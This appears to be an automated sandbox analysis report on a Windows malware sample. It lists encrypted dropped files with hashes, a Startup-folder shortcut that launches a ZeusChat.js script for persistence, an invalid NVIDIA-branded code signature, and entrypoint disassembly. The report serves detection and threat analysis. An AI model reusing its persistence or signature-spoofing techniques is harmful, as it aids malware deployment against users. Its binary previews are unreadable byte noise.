                                                                                                    Preview:.....5.Z.\#..'....~..dH.iJ^....!.tH...e....o.RU3............./...Xm`...g..G..c.b...}.Z..y..5f...k&..j...a..@83.O.c._..]....J=.#..@.`\....+..[)..I.C.L.]..1.-8w......]$..RpU..*...r...=......5Q......X....<'E......z9.g..g;..s..I.........U.j`.7og..0.Y>c....Cz"........=....K.....Z..I{...T......F...1.t_"&..4=H....T5@.+......W[..7c.'5.w..~w......m...[f."v...q.@P..E..XX:0.0.......D^...wb.n....t5.M.....j\x.4....Mu-\_.)..zRw...v.!%z...._....(..."(...V6...B..>.x._.O..a.C5....b.X.]..*@..8....4e.R..E.\.;..n..)..!8..R;2l.Y.`=>Tx..$..}....;O}f...g_..A..W.fA......]./....L6..Z>;[.P*p0..&..tZ?!qiLW.^->1.G+...f....oD.0...:..2..T.... .U..)B...}...q.......i....~.[Q.8.........#.~`.[O.xX.{e..*...5/#...5].6)ME.\..3.0wT=..Z5.....NV$...4..1..6S`o..'.t......T......).b9Pj....9W...k(.T.f.X..w|*...N-..}.L?ZU\..#J..3.|.b....;.&U.M ]..w2x...tT.oSRg,q)-3.OS*.ZC.1U..:6}9..{.9........?C.....YVX.$........Z..8V.s.Y....T:b.o'..`....-.........+.j...nS@.r1.m..`pa.).c..[.t)........

                                                                                                    C:\Users\user\AppData\Local\Temp\Seafood

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74752
                                                                                                    Entropy (8bit):7.997643505588514
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:/8jmLaw/2vM+yBLoEbabkCg11bLutq9oBDt8fnALeStIuKGmhLIsV9l3:/8jmLa8/H5Rx9ug9ottyAygIuKVr3
                                                                                                    MD5:7C647B0706E80A17DCE3805F4D133CC5
                                                                                                    SHA1:1C8B39A85852185E9D0CFCE138F9E6D2B90A0898
                                                                                                    SHA-256:2A879EB4AD27C42721DCA80A6245D6A48813BCF6CA0D904199F506CC6687BBF1
                                                                                                    SHA-512:7D991137B90A587BFF29EDEB02BA2DDDD5D4720018A0A68973210D81FB326634DA17897D96CCF74819C97FACD3055190C56D2E90A801A27F76FE95C23167A168
                                                                                                    Malicious:true
                                                                                                    Preview:...20a./P!.....%~....E.PF.>#}:9h._..j.h;.h.a...-.O.'..$.wE..8.~...9...WS.exD@..x.m...^vY....^..A.~..'.....I..ke[[..&,.8.4.r.)..2x...%m1+.,..j,by.........e.......7P.,.0}..Mbk.GD...t..u.......Y.-I.m.P..Vn....\......<.37../.7.H..r...M.H...Q:v*LPQ.F..v.#.I.=...v,.=...M....{.X......]w..@.H.N...Z..........$.U...1~_.Z.TC.G.>OQ...Y$.E..?..16..y.$.x.......|:.6.'a.T+:=.jHW.h..+...X.i....n.[.7.....-.3R=y....$....2.lR...M.}I....E@G~.(..].Q\A.?....-.`..d&.........F...q..#..\.21..T..'.,t .q.....y.\.pr........6...D.E8t.@R.......}...X.;|.9.HW.hl9....a.}0.IE.hK..jeW.>.w..Y..........j.^g .Z.;.!...\.>./..B.A...>..[..>*P.$6.?g+.i(0w?.0....T..\`.......[|TiD.....j....B".....v....0..M~}..l.kD..MM"Q..%.7..l.;..XO0. ..e.~.....T..%..{.m...h7........G.u!........x/..EK%g..,?^qd..6._+x,+.".2..._.=..ae.=.'..X.5pH.}..~r..Ge.......X...R...W.h..Y..<\..b...9[F..5.w....+.%.t.|^..T2......N.. .`..y}.."....5..&.0.Z.I.N.......f...$C_....1... .f.5...&.".[IU<-.h.....6^GT+m.....

                                                                                                    C:\Users\user\AppData\Local\Temp\Smithsonian

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96256
                                                                                                    Entropy (8bit):7.99798906004204
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:5y8iyJUmvI2g3KhAWZAI5tYOc8pjmz/3FVsg2X8fkoajjPPCZx+NN7QQYCkyya+l:5Pi2vI2h7bzo3FVsBJqZx0sQ7kyya5HY
                                                                                                    MD5:BF358168D303797778D6882D4EEEB7D2
                                                                                                    SHA1:DE8578F5F94D6F0AAB03EA978CDF592A27F29D40
                                                                                                    SHA-256:86192E5A608BA6C316954F7B01A3D32728B0C9E7D2BB5F2CCFFE7C300E65612F
                                                                                                    SHA-512:AF75E281E80DEF8AD01B494ADA6919D4EEED7509987DCD1C0966F505A98FB14BE494F5C85DE01F26D752415B54A9FE5C385DFD024A0E1F3E3EEC0F136DF78E6C
                                                                                                    Malicious:true
                                                                                                    Preview:=...M.K..M..F..%Uh..G.ADJ....DQ..c.#>#^...;.q.X....?.T....TE.Y..F1;..)..e...+.msi..........eb..dg..RY)..\..............J._....{..F[m1..U..'........|..A...3.iY..q.d..Re...z.D.Z....v,..z.A....g.{.kB....4[...D;.hB`.Q...`......6..fy.b..: }1...3y............]EL].c'.||...........s|...+Bo...>6..n9w.m4.k.hA..t#...(V....H4%...E./..Z.Q%.,.j.h...o.....]./9Uhc....R.^..L.I..mX.(........V...".8.......6.m..._.-..H.jd... ......1.y........i.4....+_4Y.D.^.a..;.......@\.2...T..$S.D.Em#'N.....}.P...[7.d..x.;.#............C.k.......?.|a.HE...g.KE.Y,......]...8G(2......<.7.D....u..4o.>.......|...0Qb.......v.. .E: B!.f..l..*.7...(........N.`JIp?..r.hv.....}.....D..(.GD~&.,.NZ...E....v.~"..|w[Jn...@.>.......H...J.-.;P.UQb.zY0~.......+...&(..=1.[].?.bsB...Pf..<.j.....k..{r..(..."....d}.6j...f...lA....?)..u6..d...yY.0..7oF>Y..A.t.>..B ..s......*......`#..."q....y....70.j..H....3.{.t..D..O.q.F.(.....s......~.....\.#c......u..K[5....].....V.

                                                                                                    C:\Users\user\AppData\Local\Temp\Sucking

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97280
                                                                                                    Entropy (8bit):7.998067775958086
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:h1xiordqEnAINwPPozO/ltaSovHtbfJ7CQ8KWFvaeCOvma8a6TEyYb3bNbZKB:fhd3nbNcow+BHzCQ8KWF+OupTE/TbNbC
                                                                                                    MD5:AB3992952FADD50CA0CA5608F1F7F570
                                                                                                    SHA1:A67DE56BDDF50265DF0EEDA6DB470086F712D6DB
                                                                                                    SHA-256:BC70E59D3EB450DF8031D425101D0DD5F0A150BCD0D6B5D95CAE455B0E5790BA
                                                                                                    SHA-512:0539ECF23D8E81A2C5B6B51CB205E48871144612F66D3F387BA69B7799F92FF536973F87DBE52121335F54BB5E35BDD64DB7673E23488328DAD31A3CC265F33E
                                                                                                    Malicious:true
                                                                                                    Preview:...q.L.....~ip...$OJ....q#.<...,z.P.....r.%.... ...|j`J.5=dEj.4...5..U7..C .X..&Q.2c*.'$......o.-Q.E.D.y`.......~..\.....j..RyY;.WU_.2.h....t{s........VV...j.]\!...9.b......$.?rby.6N....n.....Z.8;`...]..Lg.p.7E.uu.c.h97...F..J.C./.q..@L/.}..._.;?I..@.Lo..u.UDr.^{s...v....G .....Sx=."..l).h{h..q.c.0.<..l............bTh.........N.'_.o........W...+d..e....X..h!_..,v.......)7.....j.....,\.G...,2=...c............P......xu....@.~..........8..>*=.....4C}..j}We2k.....%.D.m.\x...O.B.4......,^....v...m..3.f.Z.vE....:..........4..=AC.#.n...-l.I.B.s^.-.......-.^R..`z..N..Z..ck.........../.<`.."J.....L...w..D.......a......_M..U.Wj.C...j.9....e....#V"....z#nXU.......w]..T..'#....../.......gn..G}.k.KP..j...#+.7I.].Y2...5"...z\..-.....P.dK.n.#......T...........c.;C.......(.....g.....(n.x..T.Z`..'...XE.........v....F(.|*.X...5/..|.;G'Xc...y....-..M.........Z...".4vV.{."&......ZP2p.?>.t.......u=.........m.....m..d..I:....r..HZ....z+.......fw1m1{..Y9..^

                                                                                                    C:\Users\user\AppData\Local\Temp\Tech

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1065128
                                                                                                    Entropy (8bit):6.43820773264071
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
                                                                                                    MD5:C63860691927D62432750013B5A20F5F
                                                                                                    SHA1:03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
                                                                                                    SHA-256:69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
                                                                                                    SHA-512:3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\Through

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72704
                                                                                                    Entropy (8bit):7.997454633063599
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:vXx+HOb0XDoXJHfl7Z0gtZaVjADAsSuq3gbGnvD0qxThfrk:/UHsMDW97JkVjADAXx3Xn4qxO
                                                                                                    MD5:5ECDE821195E874D98C846D36A61D9BE
                                                                                                    SHA1:D58B5F754F7C073C75556C191673687EDD6F9FDF
                                                                                                    SHA-256:E6FBFEF6271FF5511FB38D40831E25AD9B92535A66621E6CE464A98386F4649F
                                                                                                    SHA-512:06F0C80617C836C3B3E8F9197F9AEAA97AA6A8B0AD92DF09E44ED39D435A8107E17145B0665CBE3A7174B74C747A4CEF8AD09FDEBB309CC34C85B1936588C570
                                                                                                    Malicious:true
                                                                                                    Preview:.....a..EI..FiW....%...l"M..R .F..$M.c. .[.....=... .O..]P..s.6n...T.W+..".M.....h.H5.-.Hi.`...%0@...Ac|..u....6.A.P..#...>...w..=:n.r.<....._......K$....x...!./..8\.....~..DH02.{).&..kJ....PC.8`...^.@\2.i1.......q:.4V..~..g...4E.e<...i...w..g..]v@.Fr.$...M..9.AS.GS...o..&.+.e...( ..*c..{.!..8..L...G.U3..Q.j3...$......X...".7...m.o....m.O.1l...]8~B.a........|..Lo.ef..PpkI~..h`=.<.K_.+..I..d/..6.>E.....\..~....^...67...=..cf.D:-.....e$HvR......5N..O....].ZmREBcji...=o..Z.hH..=2k.x.G=i..I..D.L.~2..ws.;~..8.j..K.=.9.gV.....4G..fF.!.U.=.<O1?..`k.d..ql.?....l*.o.<s....z.N..S...F../.T..6?jG..D._~.j..q...y....l.A:.i.O...y..cm...e..0...^`$.{.z.Y...b..gu.......K..0....^.....V.k.r.^......./9p...x{$@.4...h.x...a}........7...6.Xk.LV....l..p..s.S.y%.VR...PV.Uq..m..m...}Q..o..3.e.......Usj.-_.X,>N..w.X..>.$..{/..~f.....u.q.........G...,..eK.?..s2...j.:>....z....r.g.n..F..'.......V..x4.2..t..9.92.8..tE.....i.."fM...n....Y..+..=.....5.....O.y.l...c.e.......t.......

                                                                                                    C:\Users\user\AppData\Local\Temp\Tm

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):81920
                                                                                                    Entropy (8bit):7.997919448781185
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:M318WuV/Lje58/NgEryXkIeIWnWeCZGfc5RS7SazCt39k7siBc:u1N8/NQXk9WD550GazI9k7sP
                                                                                                    MD5:D974201B21B17C64319B3AFDDAECDF05
                                                                                                    SHA1:101C54415A230BAD753C8879A76593FFB19897DA
                                                                                                    SHA-256:83E4A156F628135F8C3AAB71C0CC15FD426E5FE3BEF93ED37ECF3E540E702A45
                                                                                                    SHA-512:74E735D48E733CA719BC70FC9F15F0185DF5E6F26B600B805130C4F235DEDD3A476E590264A19866D1FA492A11CB8C5CF874049F54DB598FFBD2855E9EC8A65B
                                                                                                    Malicious:true
                                                                                                    Preview:6>......k ..+.C.U.. ..mc...)Y_LM...<.?P..W...;.]p....w jl......H.=.&.P..dy.E...Nf?....Cb..2..quck.YNV...%.(....7....q@-.[.lC'D.=...)..A.Q..5.<...$.p.(li.B..........K..f.j\.....P^.0.mK.X.[D|..s}:>...6Y.....z.S.8..#O.%1..;......I...B..A..ch...a.s.-.G.q..m].....jd>m.g........k}.q.fyp..l.9.^c.J......p...V2....c.K[....5a/E.4[m.?...9.....KDL..HU..6U.Rp..Z..,F....D....Z.P.L`...G.!.!....3..d;4.t.....T.)wQ[......Q.D..D.PU0.f{.y.q.t.Z.>..f.......-$......'F........M..I .....-.['.-.@T.&'.<...h.....T...*.......s....*...h.<..=B.M.f..~b......l...{....z}.?.1...ARt...D...-......v&..d...{...H..]...>.......Bh..C.r.A.R..C;A2.....0.Y........L........%..".E..C'.;...L...G...Z....q.0.K.'...B.,.Q(u.....y~@M2|E.._Fm..Q.'h8_....S...l..Z.|E\...H.=......$`ld.&@}7u.C.*.qv......O."....-oI.:.......PY..s.N.3>.|..:.._.k;l.a.....@.(G.ZD...c...|\..'U.u0.....Ur.._n...}^.N.K.G...8.`...p.R....IL..]i.9.m..%......*.q....Av............cB. w..KI.$:.?.?......f.b.\.:...p.3.t..1....~...

                                                                                                    C:\Users\user\AppData\Local\Temp\Turns

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88064
                                                                                                    Entropy (8bit):7.99807412881169
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:dwYJksN32wTiAc1X2LnS2N2zIdkFvbbFQWypC4FA/4Z2/avYoz10Gu9DklUJp34P:d9k8mrAwGLS2N2zImFvbbFzcCN/livYs
                                                                                                    MD5:3BE74FBC6EE02888C808EC92AC040F44
                                                                                                    SHA1:9762530702FC951013D2EF1F9152925DA7FC0E10
                                                                                                    SHA-256:375F7060E748B8A0F48ACA18638A2DC0E94574BE8963C44E689F96321BD1BD11
                                                                                                    SHA-512:3FB2B1CDE21DCF11F870B1DB3D9DA44AACFE01C0B625B1FB16FACDE9C8A99DDEE8076C14828D8623A8DB4390C3C2FDE25F1323E864F5A04196176F9A68F9DB5B
                                                                                                    Malicious:true
                                                                                                    Preview:`.8.6z..h....;L...?....!.p.......=..tSJ..{.Ce...8....D.J*.I..pg.<]......T .I.g.^_4o.}.....(Z...z$.>.ff..T|.t..:..#...Y...}`h.r...<..f..]<r.L..=...Zp..,{..2S.C~bR.....d...Kq.....T..wp\..;.t...6(@.Y.&...p.....b;Q.......2.....H^*..W.f.v.1>r..:P. .h^..tVfQ..H.....%Q......#.V....xv.Z..<{........2..B^.......kX..>38..L.....H....+l.y.1AZ..Tm..T.{.8....w.n;s..[......7.KEk.^.s+\..l.G..(M.>....|6g<......S.F...#..=Q&..=H.c.[R..v.8..v...[/wc...eP....,..q..t..(h.q...m.+.2........4...r....$2....7H.X..Zf..!.cf.....E.Cx..+......K..9~.>. .6..[P.dt...(VuQ....D..|l.5..#.!..F..O.#.g.xbf...:.<:.....+An'."E..m..D.'..,......*....:.TDmSn........]..y..f.7\...=k../.Tx.0._?..(.1/P!.yb.%.....4...w.....r.xD...o.af.`....4.h6a.*..m......T..a4.s.E2.-..Eo.>..j.SCp\.*a8....Y.-)..... ..$~t,R6.&,9....{.41.J0?...eQNz...x ..^...r.)8..DBp..& ..xt.7@L....0fdSH.J....Xp.DC.lF...N..Y4.`.....e..qz.......j.t...G.@..W.z.....VQ..%q...~hc..P.r..-&.Q.KA..a.Yf.$I.:...sp.[L...J.3b....[...^G...Nv.

                                                                                                    C:\Users\user\AppData\Local\Temp\Typical

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74752
                                                                                                    Entropy (8bit):7.997554059646999
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:kxYY9JzAu6zWvOkaaq/Io0ewysKdYodz3jzZKQnhpgjPmo9NAHMthog:ivHAu6SvOkapIo0PXKdYw3jzkQhp6isF
                                                                                                    MD5:5E994F39CCE9E10B951340C50ED7AC57
                                                                                                    SHA1:3AF9BCC59EBA50B027DEDE0B713B3560AB033E92
                                                                                                    SHA-256:BF779307AF2D71D7DDD99AA8E239755C0B4DE961CD0FBF0620DA0718870C2CB0
                                                                                                    SHA-512:5E1B9606C794DB160C7C17256999DD87F9BABC1C18F16C60BB3229AD8A37DE3D3106914B44C865F44C51E066F04724E399E7BB9487C50DD05FC38068E3B4AE54
                                                                                                    Malicious:true
                                                                                                    Preview:5..D.._K..gN...(s...l=.~...k&K.Y.:..%.D.V.8...=..._......n.9M.W.TG.a.T..K..........~..Z..M....5....\..q.9|&..6.").G....~[._0....f..s...x.....W.Xy..j.%{@.3.t..S.Q....X.<:.RH"..3..2E..@.B.UH.A.._....N..Q\/y.......e(T........&Q...v..)d.j}...h.?oD.=i...@..~..........(1...p.&..-.....tU....6...\9....Zg......U.@l..|.......F2...-<...#h..'....+..A.'.MY6wW.'4.#4.........W.r......x....Vb<.Y!..b.nM.U.'...9....8...."..G.....c4.&Q.....X.......5.wG....L.. K....C.'b....o.....M..~N....1.yDG...@....&..%..]..@..........g...P.7...|Z...;.S...x...8Z..`.2H.t%..P.B.q../1.qswCH.....N../..D.|.f.f. g3.vk..Q.j..z(.....?$..c.........{.4wa..HQ..._)....R.]..O..^.E.q..r.y..=.C....Dw...}.k....d...g<....*!X<.!.:'_.._..U..$l5.J.T]..er..Xt.....M".g.w.7P.z...x6.Z.sa..e..8*..L...w.....G....3XpG...l.c.LM......^..6/"..9?.ewo..../e.z....u.kb.nz.c/........s..St6.d~..H.. 2.A.[.KopZ3...`.....5.).C&.h....0....k..+!3!...."..........\.+fY.Mr.QG..a..E......_`8...3..J

                                                                                                    C:\Users\user\AppData\Local\Temp\Wendy

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99328
                                                                                                    Entropy (8bit):7.9980906917164045
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Lul0o74FHEfDEYdYCgssVqna1Q9qJZShA1at1XpbgaDxeEhTuLEJAhFBNDQhwMub:E0tFkfDfVgjGhvXpkk7IEJAXQ2MuXr
                                                                                                    MD5:8BD430500D4C1E0562DBDEA031FCC935
                                                                                                    SHA1:21EB8D97B4A27334B285C0EF00E9A436DEA13A08
                                                                                                    SHA-256:9312BD3FE3E138A6C6BBD1D253C493E171CABE1207351AC8A0AF19B4D3097BD0
                                                                                                    SHA-512:F5E4055F89E18B31170DDF9609FAACC6F6899320EB1299E56B8DC674E3C40CDB0B1A46EE4012AB1D84D5FE8EDCBC81B39D0F2F0ACBAEBDD98EF356E865464C31
                                                                                                    Malicious:true
                                                                                                    Preview:.I.h....N.N..04vT..6......@..W..o...5xRz.)...I..i...WO...f..?.....y....t.f.:E^..r..x.(...q.;.n...A-..6.....~ ..w/...v.P..O...g_.Sx.E.."\..6h.~....~..V"...Z....`.+....e...M.E.P....ck!.T...AM....R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.L.'.F...h..............>.......>......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.&..,P..Myn.2..t.W....^.8.Z!...W[.>..8D...>...i..m......_.}8.5...x..2).U.j....R>..#.~.\.......$h_.8..D..X.U..~X...)<.G...]...P9(..f/.._..c.Y.^...g[.T.bg.D....w$ .x9...#.K..{).....A...V*..!.+.f./J>I5.._yN`.7l..M.....a2.....||>...z.QRG........K.G..;.rda(..{.l5<...d...Q.....x.=.4..W?_8.<Oj<..;...hy.C.."x....x....g..0.Q..i. /.j...v8...iH.>...

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >), ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94
                                                                                                    Entropy (8bit):4.887734565173362
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5mcVIFzRLF:HRYF5yjo923mc6FzRLF
                                                                                                    MD5:9B0DD8841FA4337E06FAA0248CB8BE50
                                                                                                    SHA1:49052752C632FDD3ECE047AED856E7117B2B2431
                                                                                                    SHA-256:2A4F125DF75228843D8DDC45ABB7804EA97A1AE4FB1D886F4D1A1EC006A61D66
                                                                                                    SHA-512:AED4D54CFBF58EAB5BCCE26FFD4D5AA959508E053D3752C1CCE8B24AE7529B4733574250CCD67C4A8925B972DB5554D8D8CAF5196B328254E0D3369FD14AD1FC
                                                                                                    Malicious:true
                                                                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" ..

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.99708308920727
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:file.exe
                                                                                                    File size:4'389'991 bytes
                                                                                                    MD5:978752b65601018ddd10636b648b8e65
                                                                                                    SHA1:2c0e320cb0d84c6760a925d873d58e701e3e6cb1
                                                                                                    SHA256:8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782
                                                                                                    SHA512:f29382d1c14cff16ee09febc5e3c875580de84494ba0510fcae06a1e024ffd00c96d3e962d2da2132ebd864d085218c79979c1df7f3334ea2e26b5ed39cbdbe1
                                                                                                    SSDEEP:98304:WjqOA3rPgnbbKrWFkr+aROuqoq8xT3SNCROnLm8F2Eq3VVP6Mj6jP:4rA3rPCKrv7Ouq5qDwCgLdF2EcVVP6mc
                                                                                                    TLSH:3716330598340DB5FF9601F0ADFBD789E869F8305B10CBD8771884E1FA996E6B179B02
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                    File Icon

                                                                                                    Icon Hash:4cb6e64dda6666d6

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x4038af
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                    Error Number:-2146869232
                                                                                                    Not Before, Not After
                                                                                                    • 12/01/2023 19:00:00 16/01/2026 18:59:59
                                                                                                    Subject Chain
                                                                                                    • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                    Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                    Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                    Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    sub esp, 000002D4h
                                                                                                    push ebx
                                                                                                    push ebp
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000020h
                                                                                                    xor ebp, ebp
                                                                                                    pop esi
                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                    call dword ptr [00409030h]
                                                                                                    push 00008001h
                                                                                                    call dword ptr [004090B4h]
                                                                                                    push ebp
                                                                                                    call dword ptr [004092C0h]
                                                                                                    push 00000008h
                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                    call 00007FAED09C6B4Bh
                                                                                                    push ebp
                                                                                                    push 000002B4h
                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                    push eax
                                                                                                    push ebp
                                                                                                    push 0040A264h
                                                                                                    call dword ptr [00409184h]
                                                                                                    push 0040A24Ch
                                                                                                    push 00476AA0h
                                                                                                    call 00007FAED09C682Dh
                                                                                                    call dword ptr [004090B0h]
                                                                                                    push eax
                                                                                                    mov edi, 004CF0A0h
                                                                                                    push edi
                                                                                                    call 00007FAED09C681Bh
                                                                                                    push ebp
                                                                                                    call dword ptr [00409134h]
                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                    mov eax, edi
                                                                                                    jne 00007FAED09C411Ah
                                                                                                    push 00000022h
                                                                                                    pop esi
                                                                                                    mov eax, 004CF0A2h
                                                                                                    push esi
                                                                                                    push eax
                                                                                                    call 00007FAED09C64F1h
                                                                                                    push eax
                                                                                                    call dword ptr [00409260h]
                                                                                                    mov esi, eax
                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                    jmp 00007FAED09C41A3h
                                                                                                    push 00000020h
                                                                                                    pop ebx
                                                                                                    cmp ax, bx
                                                                                                    jne 00007FAED09C411Ah
                                                                                                    add esi, 02h
                                                                                                    cmp word ptr [esi], bx

                                                                                                    Rich Headers

                                                                                                    Programming Language:
                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                    • [LNK] VS2010 SP1 build 40219

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x1993e.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x42d63f0x2628
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

